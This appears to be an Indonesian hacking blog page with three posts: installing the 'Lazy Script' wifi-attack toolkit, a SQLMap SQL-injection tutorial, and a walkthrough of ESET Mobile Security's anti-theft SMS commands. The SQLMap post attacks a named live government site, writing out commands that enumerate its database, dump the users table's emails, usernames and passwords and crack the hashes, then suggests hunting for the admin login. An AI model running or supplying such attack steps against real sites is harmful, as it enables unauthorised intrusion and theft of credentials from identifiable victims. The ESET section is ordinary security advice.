No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation



Seal

Member of The Internet Defense League
DMCA.com Protection Status


Always Trust Yourself And Use Your Opportunity



Senin, 31 Juli 2017

Kali Linux : The Lazy Script


Kali ini gw mau share tool spesial buat para kaum pemalas yaitu lscript atau The Lazy Script karya arismelachroinos tool ini dirancang khusus buat para hacker yang malas dan tujukan untuk pentest wifi dan hacking lainnya.

bagaimana cara mengintall nya ?

root@yukinoshita47:~# git clone https://github.com/Yukinoshita47/lscript


kemudian tekan enter maka akan muncul seperit gambar dibawah ini


setelah itu masukkan izin permission nya dengan menekan command

root@yukinoshita47:~# chmod +x lscript/ 

kemudian tekan enter

 
 lalu masuk ke direktori lscript dengan perintah sebagai berikut

root@yukinoshita47:~# cd lscript/ 

kemudian tekan enter

 
 
lalu install dengan menggunakan perintah

root@yukinoshita47:~# chmod 777 install.sh 

lalu tekan enter kemudian masukkan lagi perintah

root@yukinoshita47:~# ./install.sh 

lalu tekan enter


tekan tombol apa saja untuk  mulai install lscript nya

 
biarkan tool nya menjalankan proses menginstall

 
lalu tekan l buka terminal lagi dan masukkan perintah

root@yukinoshita47:~# l

lalu tekan enter untuk memulai 

 
tekan tombol apa saja untuk melanjutkan


tekan YES lalu kemudian tekan enter


setting interface wifi nya sebagai contoh seperti gambar dibawah ini

ketik wlan0 lalu tekan enter
kemudian ketik wlan0mon lalu tekan enter


setelah itu tekan tombol apa saja untuk memulai


jika muncul seperti ini maka instalasi tool Lazy Script sudah selesai dan siap digunakan


selanjut nya untuk menjalankan nya hanya dengan menekan l di terminal maka akan muncul tool nya

dokumentasi : https://github.com/Yukinoshita47/lscript

selain di kali linux di linux yang lainnya juga bisa kok :D namun saya uji coba di kali linux ini tool nya berjalan dengan baik :D

sekian dan terimakasih :*

Kamis, 27 Juli 2017

Kali Linux : SQL Injection dan Auto Crack Hash Password Dengan SQLMap


Yo kembali lagi bersama gw yukinoshita 47 kali ini gw mau sharing tutorial tentang SQL Map banyak jg sih yg request sampe bosan gw denger nya wkwkwkwkwk.

oke kali ini live target tutorial nya http://dev2.kopertis7.go.id seperti gambar dibawah ini bug nya terletak di http://dev2.kopertis7.go.id/gallery_info.php?id=35

 

masukkan perintah

root@yukinoshita47:~# sqlmap -u http://situstarget.com --dbs

contoh :
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 --dbs


biarkan tool nya berjalan seperti gambar dibawa ini


jika muncul persetujuan buat lanjutkan eksekusi ketik y terus tekan enter seperti gambar dibawah ini

 


 

jika berhasil maka akan muncul seperti gambar dibawah ini :

 
lalu untuk melihat tabel dari database tersebut eksekusi perintah

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --table

contoh
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --table

 

kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

 
selanjut nya untuk melihat isi dari tabel tersebut perintahnya adalah

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --columns

contoh :
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --columns

 
kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

 
setelah itu kolom-kolom dari tabel database tersebut akan kelihatan seperti gambar dibawah ini.

 
untuk melihat isi dari kolom dan tabel tadi adalah menggunakan perintah.

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase -T namatabel -C namakolom --dump

contoh
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb -T users -C email,password,user_id,username --dump

 
 kemudian tekan enter dan akan muncul seperti gambar dibawah ini sqlmap akan meminta persetujuan untuk menggunakan tools lainnya disini saya iya kan dengan menekan y dan kemudian tekan enter

 
kemudian muncul lagi persetujuan untuk menggunakan metode dictionary attack atau bruteforce tekan aja y kemudian tekan enter.

 
kemudian ada 3 pilihan

- 1 menggunakan wordlist default bawaan sqlmap
- 2 menggunakan wordlist custom
- 3 menggunakan file wordlist

disini saya pilih aja default dengan menekan 1 kemudian tekan enter

 
kemudian akan muncul seperti gambar dibawah ini kali ini tergantung keinginan saja disini saya pilih tidak dengan menekan n kemudian tekan enter

 
biarkan sqlmap crack hash password nya

 
jika berhasil akan muncul seperti gambar dibawah ini.



oke untuk mencari dimana login nya ya seperti biasa kalian cari aja pake admin finder :p

untuk log pentest dari SQLMap di tutorial ini  klik disini

oke cukup sampe disini tutorial nya sekian dan terimakasih

Mengamankan Perangkat Android dengan ESET Mobile Security



Kali ini gw Yukinoshita47 mau bahas mengenai mobile security sering kita temui masalah di perangkat Android kesayangan kita ini yaitu sebagai berikut :

  • Malware / Virus
  • Nebar Spam / Phising
  • Iklan yang menguras kuota
  • Tukang Ngintip privasi orang 
  • Maling  ataupun Pencuri
  • dan lain-lain
Solusi dari masalah keamanan tersebut adalah  dengan menggunakan aplikasi Antivirus dan Security yaitu

ESET Mobile Security


ESET Mobile Security dapat mengatasi masalah Malware dan sejenisnya


 ESET Mobile Security juga dapat block aplikasi, file dan dokumen yang terinfeksi malware dan sejenis nya


ESET Mobile Security selalu update mengenai laporan keamanan


ESET Mobile Security sudah pasti anti phising dan mendeteksi website yang mengandung unsur phising


dengan ESET Mobile Security kita jadi gampang mau cek permission apps di smartphone android kita. 


ESET Mobile Security dapan mengontrol semua nya dalam satu tempat


ESET Mobile Security terintregasi dengan situs web nya untuk melacak perangkat smartphone yang hilang atau dicuri 


ESET Mobile Security rating nya juga lumayan tinggi



Fitur yang dimiliki oleh ESET Mobile Security

  • Anti Virus
  • Anti Phising
  • Anti Pencurian
  • Filtering SMS dan Telpon 
  • Pemeriksaan Keamanan / Security Audit
  • Laporan Keamanan / Security Report 


 kali ini yang mau gw uji coba dalah fitu Anti Theft nya sebenarnya disini gw gak perlu jelasin dengan detail karena aplikasi mobile saat ini user friendly semua jadi gak perlu dijelasin udah ngerti sendiri.

punya smartphone auto update dan anti gaptek :p

gw jelasin secara singkat aja ya gimana cara menggunakan Anti Theft nya

pertama buka web portal

 

maka muncul seperti gambar dibawa ini lalu aktifkan dan pilih improve security


 kemudian aktifkan semua nya :v



setting web portal selesai lanjut kemudian setting SIM Guard nya

langkah-langkah nya

  1. enable / aktifkan Guard
  2. enable / aktifkan Notify your friends
  3. Tambah kan trusted friend dengan menekan tombol + di pojok kiri bawah seperti gambar dibawah ini

    NB : dengan mengisi nama dan nomor telpon nya bagian ini nomor hp orang terdekat yang bisa dipercaya



kemudian lanjut pilih menu settings

Pilih security password lalu masukkan password nya  dan pilih save

  

setelah itu contact detail nya isi nama dan nomor hp backup / nomor hp orang yang terdekat dan dipercaya setelah itu save

 

lanjut ke SMS text Command ini ne yang mau gw uji coba dan inti utama dari pembahasan ini adalah fitur SMS text command.

pertama pilih SMS Password lalu masukin password nya contoh : 11223344 kemudian save





berikut daftar perintah sms commands nya

contoh disini saya menggunakan password : 11223344

fungsi dan cara menggunakan fitur nya

eset lock password  untuk mengunci perangkat android
eset siren  password  untuk membunyikan alarm perangkat
android
eset find password  untuk melacak perangkat
android
eset wipe password  untuk menghapus data perangkat android 

untuk mengeksekusinya kirim sms ke nomor hp yang ada diperangkat android yang sudah terinstall ESET mobile security contoh nomor hp nya : 0869696969

format nya sesuai di atas

kalo ingin mengunci ketik eset lock 11223344 kirim ke 0869696969
kalo ingin bunyikan alarm ketik eset siren 11223344 kirim ke 0869696969
kalo ingin melacak ketik eset find 11223344 kirim ke 0869696969
kalo ingin hapus data ketik eset wipe 11223344 kirim ke 0869696969

contoh disini saya sms pakai hp lain untuk sms ke hp 0869696969 

saya ingin mengunci dengan mengetik eset lock 11223344 kirim ke 0869696969 secara otomatis langsung mengunci perangkat nya



 gambar dibawah ini adalah perangkat yang terkunci oleh ESET Mobile security


kalo mau membuka kuncian nya pilih unlock lalu masukkan password nya



lalu untuk melacak lokasi perangkat via sms Command yaitu untuk contoh dengan cara ketik eset find 11223344 kirim ke 0869696969 maka otomatis perangkat android tersebut membalas SMS Koordinat GPS Google map seperti gambar dibawah ini





gampang kan biar lebih jelas nya coba kalian praktekkan sendiri ya :D
sebagai pesan nya adalah tetap waspada dan jaga lah barang2 berharga kalian termasuk smartphone kalian dari para pencuri dan pihak yang tidak bertanggung jawab.

aktifkan selalu anti theft di perangkat kalian jika terjadi kemalingan ya masih bisa dilacak dan dikerjain itu maling bangsat

bisakah melacak, mengunci, membunyikan alarm, dan menghapus data di smartphone / perangkat android yang telah dicuri tanpa diinstall anti-theft sebelumnya jawaban nya TIDAK...!!!!!!!! JANGAN BERPIKIR KALO ADA AHLI IT DAN HACKER SEMUANYA JADI SERBA GAMPANG GITU MIKIR....!!!!